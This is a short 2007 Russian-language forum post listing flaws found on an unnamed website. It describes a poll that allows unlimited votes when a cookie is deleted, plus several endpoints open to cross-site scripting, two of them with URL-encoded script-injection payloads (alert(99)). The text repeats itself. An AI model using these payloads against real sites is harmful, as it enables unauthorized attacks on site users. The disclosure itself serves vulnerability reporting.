BlackCats
18.12.2007, 21:35
нашёл во время проверки одного сайта:
голосовать можно сколько угодно раз, удаляя кук poll
xss тут:
/rss/rss.php
/rss/show_webfeed.php?wcCategory=0&wcHeadlines=1%22%3E%3Cscript%3Ealert(99)%3C/script%3E
/index.php?category=14%22%3E%3Cscript%3Ealert(99)%3 C/script%3E/*&pg=2
/sendemail.php
/contact.php
голосовать можно сколько угодно раз, удаляя кук poll
xss тут:
/rss/rss.php
/rss/show_webfeed.php?wcCategory=0&wcHeadlines=1%22%3E%3Cscript%3Ealert(99)%3C/script%3E
/index.php?category=14%22%3E%3Cscript%3Ealert(99)%3 C/script%3E/*&pg=2
/sendemail.php
/contact.php